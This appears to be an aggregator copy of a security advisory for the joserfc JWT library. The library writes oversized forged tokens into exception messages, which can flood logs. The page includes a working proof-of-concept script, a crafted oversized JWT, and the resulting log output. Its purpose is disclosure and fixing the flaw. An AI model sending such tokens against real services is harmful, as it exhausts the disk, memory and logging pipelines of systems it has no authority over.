Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-frfh-8v73-gjg4: joserfc has Possible Uncontrolled Resource Consumption Vulnerability Triggered by Logging Arbitrarily Large JWT Token Payloads

Summary

The ExceededSizeError exception messages are embedded with non-decoded JWT token parts and may cause Python logging to record an arbitrarily large, forged JWT payload.

Details

In situations where a misconfigured — or entirely absent — production-grade web server sits in front of a Python web application, an attacker may be able to send arbitrarily large bearer tokens in the HTTP request headers. When this occurs, Python logging or diagnostic tools (e.g., Sentry) may end up processing extremely large log messages containing the full JWT header during the joserfc.jwt.decode() operation. The same behavior also appears when validating claims and signature payload sizes, as the library raises joserfc.errors.ExceededSizeError() with the full payload embedded in the exception message. Since the payload is already fully loaded into memory at this stage, the library cannot prevent or reject it per se.

It is therefore the responsibility of the underlying web server (uvicorn/h11, gunicorn, Starlette, Werkzeug, nginx…etc) to enforce limits on header sizes. For example, a FastAPI/Starlette application running without uvicorn and/or gunicorn cannot enforce header size limits on its own. With uvicorn/h11, the –h11-max-incomplete-event-size <int> option can restrict the total size of the header plus body, but not the header alone. Similarly, vLLM serve —due to its reliance on uvicorn/h11 and the need for heavy data transfer in ML inference workloads, sets a default limit of 4 MB for header plus body and is frequently increased. In practice, a robust reverse proxy (such as nginx) is typically required because it can explicitly cap maximum header size. Unfortunately, many web applications do not run behind a proper reverse proxy.

Given these constraints, the joserfc library cannot safely log or embed payloads of arbitrary size. This issue is particularly subtle, as it occurs only when a maliciously crafted JWT finally reaches the Python application, a scenario that most developers will never encounter during routine development and testing.

PoC

Environment Ubuntu 24.04 LTS Python 3.12 Tested on joserfc version 1.4.1


import logging
from datetime import UTC, datetime, timedelta

from joserfc import jwt
from joserfc.errors import ExceededSizeError, UnsupportedAlgorithmError
from joserfc.jwk import OctKey


logger = logging.getLogger(__name__)


SECRET_KEY = "8c13bd66babc241b29f8553429bdab7deb6f5b74ddfda7765471e57ecd55641e"
LONG_JWT_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ"
    "."
    "eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ"
    "."
    "6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8"
)

HEADER = {
    "alg": (
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
    ),
}
CLAIMS = {
    "iss": "auth_server",
    "iat": datetime.now(UTC),
    "exp": datetime.now(UTC) + timedelta(minutes=15),
}


def main():
    # Create OctKey from SECRET_KEY
    key = OctKey.import_key(SECRET_KEY)

    # Simulate creating a very large JWT
    # (this will fail with joserfc.errors.UnsupportedAlgorithmError
    # due to an invalid 'alg' header content
    try:
        token = jwt.encode(HEADER, CLAIMS, key)
    except UnsupportedAlgorithmError:
        # Use a forged token that has the same header and claims instead
        # but an invalid signature
        token = LONG_JWT_TOKEN
    logger.warning(f"Created JWT: {token}")

    # Now try to decode the large JWT
    try:
        decoded_token = jwt.decode(token, key)
        logger.warning("This line will never be reached.")
        logger.warning(decoded_token.claims)
    except ExceededSizeError:
        logger.exception(
            "The JWT size is too large and may be a security attack attempt."
        )
        # this is logging the whole header content in the exception message!


Created JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ.eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ.6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8
The JWT size is too large and may be a security attack attempt.
Traceback (most recent call last):
  File "security_issue.py", line 55, in main
    claims = jwt.decode(token, key)
             ^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/jwt.py", line 106, in decode
    header, payload = _decode_jws(_value, key, algorithms, registry)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/jwt.py", line 127, in _decode_jws
    jws_obj = deserialize_compact(value, key, algorithms, registry)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/jws.py", line 183, in deserialize_compact
    obj = extract_compact(to_bytes(value), payload, registry)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/_rfc7797/compact.py", line 50, in extract_rfc7515_compact
    registry.validate_header_size(header_segment)
  File ".venv/lib/python3.12/site-packages/joserfc/_rfc7515/registry.py", line 104, in validate_header_size
    raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")
joserfc.errors.ExceededSizeError: exceeded_size: Header size of 'b'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ'' exceeds 512 bytes.

Code location

This behavior occurs in:

joserfc/_rfc7515/registry.py L102-112

    def validate_header_size(self, header: bytes) -> None:
        if header and len(header) > self.max_header_length:
            raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")

    def validate_payload_size(self, payload: bytes) -> None:
        if payload and len(payload) > self.max_payload_length:
            raise ExceededSizeError(f"Payload size of '{payload!r}' exceeds {self.max_payload_length} bytes.")

    def validate_signature_size(self, signature: bytes) -> None:
        if len(signature) > self.max_signature_length:
            raise ExceededSizeError(f"Signature of '{signature!r}' exceeds {self.max_signature_length} bytes.")

joserfc/_rfc7516/registry.py L103-123

    def validate_protected_header_size(self, header: bytes) -> None:
        if header and len(header) > self.max_protected_header_length:
            raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_protected_header_length} bytes.")

    def validate_encrypted_key_size(self, ek: bytes) -> None:
        if ek and len(ek) > self.max_encrypted_key_length:
            raise ExceededSizeError(f"Encrypted key size of '{ek!r}' exceeds {self.max_encrypted_key_length} bytes.")

    def validate_initialization_vector_size(self, iv: bytes) -> None:
        if iv and len(iv) > self.max_initialization_vector_length:
            raise ExceededSizeError(
                f"Initialization vector size of '{iv!r}' exceeds {self.max_initialization_vector_length} bytes."
            )

    def validate_ciphertext_size(self, ciphertext: bytes) -> None:
        if ciphertext and len(ciphertext) > self.max_ciphertext_length:
            raise ExceededSizeError(f"Ciphertext size of '{ciphertext!r}' exceeds {self.max_ciphertext_length} bytes.")

    def validate_auth_tag_size(self, tag: bytes) -> None:
        if tag and len(tag) > self.max_auth_tag_length:
            raise ExceededSizeError(f"Auth tag size of '{tag!r}' exceeds {self.max_auth_tag_length} bytes.")

Another occurrence of ExceededSizeError in joserfc/_rfc7518/jwe_zips.py is not affected by this issue as it does not include the payload content in the exception message.

Impact

In scenarios where a web application does not reject excessively large HTTP header payloads, using joserfc can expose the system to an Allocation of Resources Without Limits or Throttling (CWE-770), potentially impacting disk, memory, and CPU on the application host, as well as any external log storage, ingestion pipelines or alerting services. This risk can be mitigated by removing the JWT payload from the logged content in some joserfc.errors.ExceededSizeError() exception message occurrences. It would also be beneficial for the documentation to advise deploying the library behind a robust web server or reverse proxy that correctly enforces maximum request header sizes.

ghsa
Open in Source
#vulnerability#web#ios#ubuntu#js#git#nginx#auth

Summary

The ExceededSizeError exception messages are embedded with non-decoded JWT token parts and may cause Python logging to record an arbitrarily large, forged JWT payload.

Details

In situations where a misconfigured — or entirely absent — production-grade web server sits in front of a Python web application, an attacker may be able to send arbitrarily large bearer tokens in the HTTP request headers. When this occurs, Python logging or diagnostic tools (e.g., Sentry) may end up processing extremely large log messages containing the full JWT header during the joserfc.jwt.decode() operation. The same behavior also appears when validating claims and signature payload sizes, as the library raises joserfc.errors.ExceededSizeError() with the full payload embedded in the exception message. Since the payload is already fully loaded into memory at this stage, the library cannot prevent or reject it per se.

It is therefore the responsibility of the underlying web server (uvicorn/h11, gunicorn, Starlette, Werkzeug, nginx…etc) to enforce limits on header sizes. For example, a FastAPI/Starlette application running without uvicorn and/or gunicorn cannot enforce header size limits on its own. With uvicorn/h11, the --h11-max-incomplete-event-size option can restrict the total size of the header plus body, but not the header alone. Similarly, vLLM serve —due to its reliance on uvicorn/h11 and the need for heavy data transfer in ML inference workloads, sets a default limit of 4 MB for header plus body and is frequently increased. In practice, a robust reverse proxy (such as nginx) is typically required because it can explicitly cap maximum header size. Unfortunately, many web applications do not run behind a proper reverse proxy.

Given these constraints, the joserfc library cannot safely log or embed payloads of arbitrary size. This issue is particularly subtle, as it occurs only when a maliciously crafted JWT finally reaches the Python application, a scenario that most developers will never encounter during routine development and testing.

PoC

Environment
Ubuntu 24.04 LTS
Python 3.12
Tested on joserfc version 1.4.1

import logging from datetime import UTC, datetime, timedelta

from joserfc import jwt from joserfc.errors import ExceededSizeError, UnsupportedAlgorithmError from joserfc.jwk import OctKey

logger = logging.getLogger(__name__)

SECRET_KEY = “8c13bd66babc241b29f8553429bdab7deb6f5b74ddfda7765471e57ecd55641e” LONG_JWT_TOKEN = ( “eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ” “.” “eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ” “.” “6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8” )

HEADER = { "alg": ( “RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd” “RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd” “RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd” “RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd” “RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd” “RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd” ), } CLAIMS = { "iss": "auth_server", "iat": datetime.now(UTC), "exp": datetime.now(UTC) + timedelta(minutes=15), }

def main(): # Create OctKey from SECRET_KEY key = OctKey.import_key(SECRET_KEY)

\# Simulate creating a very large JWT
\# (this will fail with joserfc.errors.UnsupportedAlgorithmError
\# due to an invalid 'alg' header content
try:
    token \= jwt.encode(HEADER, CLAIMS, key)
except UnsupportedAlgorithmError:
    \# Use a forged token that has the same header and claims instead
    \# but an invalid signature
    token \= LONG\_JWT\_TOKEN
logger.warning(f"Created JWT: {token}")

\# Now try to decode the large JWT
try:
    decoded\_token \= jwt.decode(token, key)
    logger.warning("This line will never be reached.")
    logger.warning(decoded\_token.claims)
except ExceededSizeError:
    logger.exception(
        "The JWT size is too large and may be a security attack attempt."
    )
    \# this is logging the whole header content in the exception message!

Created JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ.eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ.6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8
The JWT size is too large and may be a security attack attempt.
Traceback (most recent call last):
  File "security_issue.py", line 55, in main
    claims = jwt.decode(token, key)
             ^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/jwt.py", line 106, in decode
    header, payload = _decode_jws(_value, key, algorithms, registry)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/jwt.py", line 127, in _decode_jws
    jws_obj = deserialize_compact(value, key, algorithms, registry)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/jws.py", line 183, in deserialize_compact
    obj = extract_compact(to_bytes(value), payload, registry)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File ".venv/lib/python3.12/site-packages/joserfc/_rfc7797/compact.py", line 50, in extract_rfc7515_compact
    registry.validate_header_size(header_segment)
  File ".venv/lib/python3.12/site-packages/joserfc/_rfc7515/registry.py", line 104, in validate_header_size
    raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")
joserfc.errors.ExceededSizeError: exceeded_size: Header size of 'b'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ'' exceeds 512 bytes.

Code location

This behavior occurs in:

joserfc/_rfc7515/registry.py
L102-112

def validate\_header\_size(self, header: bytes) \-> None:
    if header and len(header) \> self.max\_header\_length:
        raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max\_header\_length} bytes.")

def validate\_payload\_size(self, payload: bytes) \-> None:
    if payload and len(payload) \> self.max\_payload\_length:
        raise ExceededSizeError(f"Payload size of '{payload!r}' exceeds {self.max\_payload\_length} bytes.")

def validate\_signature\_size(self, signature: bytes) \-> None:
    if len(signature) \> self.max\_signature\_length:
        raise ExceededSizeError(f"Signature of '{signature!r}' exceeds {self.max\_signature\_length} bytes.")

joserfc/_rfc7516/registry.py
L103-123

def validate\_protected\_header\_size(self, header: bytes) \-> None:
    if header and len(header) \> self.max\_protected\_header\_length:
        raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max\_protected\_header\_length} bytes.")

def validate\_encrypted\_key\_size(self, ek: bytes) \-> None:
    if ek and len(ek) \> self.max\_encrypted\_key\_length:
        raise ExceededSizeError(f"Encrypted key size of '{ek!r}' exceeds {self.max\_encrypted\_key\_length} bytes.")

def validate\_initialization\_vector\_size(self, iv: bytes) \-> None:
    if iv and len(iv) \> self.max\_initialization\_vector\_length:
        raise ExceededSizeError(
            f"Initialization vector size of '{iv!r}' exceeds {self.max\_initialization\_vector\_length} bytes."
        )

def validate\_ciphertext\_size(self, ciphertext: bytes) \-> None:
    if ciphertext and len(ciphertext) \> self.max\_ciphertext\_length:
        raise ExceededSizeError(f"Ciphertext size of '{ciphertext!r}' exceeds {self.max\_ciphertext\_length} bytes.")

def validate\_auth\_tag\_size(self, tag: bytes) \-> None:
    if tag and len(tag) \> self.max\_auth\_tag\_length:
        raise ExceededSizeError(f"Auth tag size of '{tag!r}' exceeds {self.max\_auth\_tag\_length} bytes.")

Another occurrence of ExceededSizeError in joserfc/_rfc7518/jwe_zips.py is not affected
by this issue as it does not include the payload content in the exception message.

Impact

In scenarios where a web application does not reject excessively large HTTP header payloads, using joserfc can expose the system to an Allocation of Resources Without Limits or Throttling (CWE-770), potentially impacting disk, memory, and CPU on the application host, as well as any external log storage, ingestion pipelines or alerting services. This risk can be mitigated by removing the JWT payload from the logged content in some joserfc.errors.ExceededSizeError() exception message occurrences. It would also be beneficial for the documentation to advise deploying the library behind a robust web server or reverse proxy that correctly enforces maximum request header sizes.

References

  • GHSA-frfh-8v73-gjg4
  • authlib/joserfc@63932f1
  • authlib/joserfc@673c874
  • https://github.com/authlib/joserfc/releases/tag/1.3.5
  • https://github.com/authlib/joserfc/releases/tag/1.4.2

ghsa: Latest News

GHSA-7xcv-9j6c-2fmc: Modular Max Serve has Unsafe Deserialization vulnerability
ghsa